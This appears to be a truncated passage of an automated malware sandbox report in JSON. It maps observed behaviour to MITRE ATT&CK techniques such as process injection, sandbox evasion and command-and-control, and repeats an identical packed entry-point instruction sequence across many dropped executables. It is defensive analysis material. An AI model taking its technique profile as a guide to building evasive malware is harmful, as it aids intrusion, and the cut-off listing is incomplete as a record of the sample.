1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rhnvfjn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hlrxpfj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4080482.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2286284.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2020002.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"06062.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8808880.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dptrvt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nxthl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"606282.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"402060.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"422022.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0066646.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"066460.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6400262.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"njxth.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rhnnvfl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ddxvh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"trrfx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ldprbfj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rndlb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nxdndh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"242220.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"66846.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rhnvfjn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hlrxpfj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4080482.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2286284.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2020002.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"06062.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8808880.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dptrvt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nxthl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"606282.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"402060.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"422022.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0066646.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"066460.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6400262.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"njxth.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rhnnvfl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ddxvh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"trrfx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ldprbfj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rndlb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nxdndh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"242220.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 